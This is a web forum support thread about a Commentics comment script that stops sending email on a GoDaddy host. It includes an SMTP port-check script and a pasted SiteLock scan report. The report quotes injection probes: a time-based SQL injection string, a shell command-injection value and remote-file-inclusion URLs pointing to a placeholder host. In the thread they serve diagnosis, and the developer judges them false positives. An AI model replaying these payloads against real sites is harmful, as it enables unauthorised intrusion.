
email not sending
#1

Hello Steven,

My Commentics site has been inactive for a while, but today someone posted and I did not receive the admin notification.
When I found out about the post, I had to approve the post and send out the notifications. The emails are apparently not going out. I did several tests, first using Gmail as the sender, then GoDaddy. Neither of them worked. I then changed from PHP basic to PHP swift. Neither of them would work.

Another possible consideration is that I cannot upgrade to your newest version because GoDaddy has PHP Version 5.4.45, which is not high enough.

I'm hoping to solve the email problem. Thanks
Reply
#2

Hi Gabe, okay it may not be due to the transport method then. Try working your way through the other possibilities in this FAQ:

https://www.commentics.org/support/knowl...article=25

Have you completed the interview?
Reply
#3

I saw the following error; there are quite a few similar ones:

Error Log Backend:

[28-Dec-2016 17:37:55 America/New_York] PHP Fatal error:  Uncaught exception 'Swift_TransportException' with message 'Connection could not be established with host smtpout.secureserver.net [Connection refused #111]' in /home/gabe7/public_html/comments/includes/external/swift_mailer/lib/classes/Swift/Transport/StreamBuffer.php:259
Stack trace:
Reply
#4

I see, so this is because your SMTP relay server (smtpout.secureserver.net) is refusing the connection. There are a few reasons why this might happen. For example, it could be that your host is blocking outgoing connections on whatever port you've entered in 'Settings -> Email -> Setup'. I'd check with your host to see if they've changed something (maybe they have an email setup tutorial that has new instructions). In any case it's really a server issue which they'd have to resolve.

Have you completed the interview?
Reply
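An added example, not part of the thread and not Commentics code: a small probe that tells "connection refused" (errno 111, ECONNREFUSED, as in the log above) apart from a silent timeout when run from the web server. The port list and the function names are assumptions; the relay hostname is the one from the error log.

```python
import errno
import socket

# Ports conventionally used for SMTP relay/submission (assumed candidates;
# use the ports listed in the host's own mail setup guide).
SMTP_PORTS = (25, 465, 587)

def probe(host, port, timeout=5.0):
    """Attempt one TCP connection and classify the outcome."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "open"
    except ConnectionRefusedError:      # errno 111 on Linux
        return "refused"
    except socket.timeout:              # packets dropped, no answer at all
        return "timeout"
    except socket.gaierror:             # hostname did not resolve
        return "dns-failure"
    except OSError as exc:
        return "error:" + errno.errorcode.get(exc.errno, str(exc.errno))

def diagnose(host, ports=SMTP_PORTS, timeout=5.0):
    """Probe every candidate port and summarise what the pattern suggests."""
    results = {port: probe(host, port, timeout) for port in ports}
    seen = set(results.values())
    if "open" in seen:
        hint = "reachable: use an open port in Settings -> Email -> Setup"
    elif seen == {"refused"}:
        hint = "refused on every port: relay or host firewall rejects this server"
    elif seen == {"timeout"}:
        hint = "timeouts only: outbound traffic is probably dropped by the host"
    else:
        hint = "mixed failures: send these results to the host's support"
    return results, hint

if __name__ == "__main__":
    results, hint = diagnose("smtpout.secureserver.net")
    for port, outcome in results.items():
        print(port, outcome)
    print(hint)
```
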
#5

Steve,

There was malware on my website, and that seemed to be the reason that the email was blocked on the server. But after the malware was removed, it turns out that there is also a problem with the coding. So there is still a block. I copied and pasted the following from SiteLock:

High
CGI Generic SQL Injection (blind, time based)
Port: 80 Service: www
Exclude Finding

Synopsis: A CGI application hosted on the remote web server is potentially prone to SQL injection attack.

Description: By sending specially crafted parameters to one or more CGI scripts hosted on the remote web server, SiteLock was able to get a slower response, which suggests that it may have been able to modify the behavior of the application and directly access the underlying database.

An attacker may be able to exploit this issue to bypass authentication, read confidential data, modify the remote database, or even take control of the remote operating system.

Note that this script is experimental and may be prone to false positives.

Solution: Modify the affected CGI scripts so that they properly escape arguments.

Technical Details:

Using the GET HTTP method, SiteLock found that :

+ The following resources may be vulnerable to blind SQL injection (time based) :

+ The 'cmtx_remember' parameter of the /fleebabylon.php#cmtx_form CGI :

/fleebabylon.php#cmtx_form?recaptcha_response_field=manual_challenge&rec
aptcha_challenge_field=&cmtx_website=http%3a%2f%2f&cmtx_user_answer=&cmt
x_reply_id=0&cmtx_town=&cmtx_real_answer=e&cmtx_preview=Preview&cmtx_pre
v_def=&cmtx_notify=&cmtx_comment=&cmtx_country=&cmtx_email=&cmtx_honeypo
t=&cmtx_name=&cmtx_resubmit_key=xhl66voat9zutueyhnlr&cmtx_security_key=c
4l5uudjvjud47qb0sb2&cmtx_sub_def=&cmtx_submit=Add%20Comment&cmtx_time=14
83046767&cmtx_remember='));SELECT%20pg_sleep(3);--
-------- output --------

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

Synopsis: It may be possible to run arbitrary code on the remote web server.

Description: The remote web server hosts CGI scripts that fail to adequately sanitize request strings. By leveraging this issue, an attacker may be able to execute arbitrary commands on the remote host.

Note that this script uses a time-based detection method which is less reliable than the basic method.

Solution: Restrict access to the vulnerable application. Contact the vendor for a patch or upgrade.

Technical Details:

Using the GET HTTP method, SiteLock found that :

+ The following resources may be vulnerable to arbitrary command execution (time based) :

+ The 'cmtx_email' parameter of the /fleebabylon.php#cmtx_form CGI :

/fleebabylon.php#cmtx_form?recaptcha_response_field=manual_challenge&rec
aptcha_challenge_field=&cmtx_website=http%3a%2f%2f&cmtx_user_answer=&cmt
x_reply_id=0&cmtx_remember=&cmtx_real_answer=e&cmtx_preview=Preview&cmtx
_prev_def=&cmtx_notify=&cmtx_comment=&cmtx_country=&cmtx_town=&cmtx_hone
ypot=&cmtx_name=&cmtx_resubmit_key=xhl66voat9zutueyhnlr&cmtx_security_ke
y=c4l5uudjvjud47qb0sb2&cmtx_sub_def=&cmtx_submit=Add%20Comment&cmtx_time
=1483046767&cmtx_email=%20;%20x%20%7C%7C%20sleep%203%20%26

-------- output --------

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

Synopsis: Arbitrary code may be run on the remote server.

Description: The remote web server hosts CGI scripts that fail to adequately sanitize request strings. By leveraging this issue, an attacker may be able to include a remote file from a remote server and execute arbitrary commands on the target host.

Solution: Restrict access to the vulnerable application. Contact the vendor for a patch or upgrade.

Technical Details:

Using the GET HTTP method, SiteLock found that :

+ The following resources may be vulnerable to web code injection :

+ The 'cmtx_video_dialog_field' parameter of the /fleebabylon.php CGI :

/fleebabylon.php?cmtx_video_dialog_field=http://a8c3aI3L.example.com/

-------- output --------
"to his own land"-- "to his own people" .... so where are you from [...]

[...] included, require speakers to prove their point by Yahweh's Word. And it is the commanded method for every belief. If there is no specific and clearly understandable Scripture saying a thing, then any decision, belief, is of one's own decision. If there is no plain, clear Scripture commanding to flee to the middle-east nation named Israel, then there is no command from Yahweh to do so. By fleeing to ... Read MoreOne good thing about attending at Assembly of Yahweh in Eaton Rapids, Michigan, is some, me includ [...]

The following are some of the prophesies concerning Babylon...
------------------------

+ The 'recaptcha_response_field' parameter of the /fleebabylon.php#cmtx_form CGI :

/fleebabylon.php#cmtx_form?recaptcha_response_field=http://a8c3aI3L.exam
ple.com/

-------- output --------
"to his own land"-- "to his own people" .... so where are you from [...]

[...] included, require speakers to prove their point by Yahweh's Word. And it is the commanded method for every belief. If there is no specific and clearly understandable Scripture saying a thing, then any decision, belief, is of one's own decision. If there is no plain, clear Scripture commanding to flee to the middle-east nation named Israel, then there is no command from Yahweh to do so. By fleeing to ... Read MoreOne good thing about attending at Assembly of Yahweh in Eaton Rapids, Michigan, is some, me includ [...]

The following are some of the prophesies concerning Babylon...
Reply
#6

Hi Gabe, I've looked into this and they're all false positives. Every arbitrary input, including the ones mentioned, is properly escaped for the database. Performing a time-based test like they've done is prone to false positives because a page can load slower for countless reasons and not simply because they've changed one of the values in the request. A good host shouldn't block you by relying on these tests. They need to actually spend a minute or two to verify the outcomes, at which point I'm certain they'll release the block and consequently review their procedures.

Have you completed the interview?
Reply
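An added illustration of the verification step described in the last reply (not part of the thread, and not SiteLock or Commentics code): a single slow response can trip a time-based check, whereas a delay that is really caused by the input follows the requested value across repeated trials. All timing samples are constructed and the function names are hypothetical.

```python
from statistics import median

def single_shot_flag(baseline_s, probe_s, requested_s):
    """Scanner-style check: one slow response is enough to raise a finding."""
    return probe_s - baseline_s >= 0.9 * requested_s

def delay_tracks_request(baseline, probes, tolerance=0.5):
    """baseline: seconds for unmodified requests.
    probes: {requested delay in seconds: [observed seconds, ...]}.
    A delay caused by the input adds roughly the requested time for every
    requested value; ordinary server noise does not scale with the request."""
    if len(probes) < 2:
        raise ValueError("need at least two different requested delays")
    base = median(baseline)
    extra = {d: round(median(obs) - base, 2) for d, obs in probes.items()}
    tracks = all(abs(e - d) <= tolerance for d, e in extra.items())
    return {"baseline_median": base, "extra": extra, "tracks_delay": tracks}

# Constructed samples: a busy shared host with occasional slow page loads.
NOISY_BASELINE = [0.4, 0.6, 3.9, 0.5, 0.7]
NOISY_PROBES = {3: [0.5, 3.8, 0.6, 0.4, 0.7], 6: [0.6, 0.5, 4.1, 0.7, 0.5]}

# Constructed samples: timings when the input really does reach a sleep.
REAL_BASELINE = [0.4, 0.5, 0.6, 0.5, 0.4]
REAL_PROBES = {3: [3.4, 3.6, 3.5, 3.5, 3.7], 6: [6.5, 6.4, 6.6, 6.5, 6.7]}

if __name__ == "__main__":
    # One unlucky pair of requests is enough for the single-shot check.
    print(single_shot_flag(NOISY_BASELINE[0], NOISY_PROBES[3][1], 3))
    print(delay_tracks_request(NOISY_BASELINE, NOISY_PROBES))
    print(delay_tracks_request(REAL_BASELINE, REAL_PROBES))
```
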

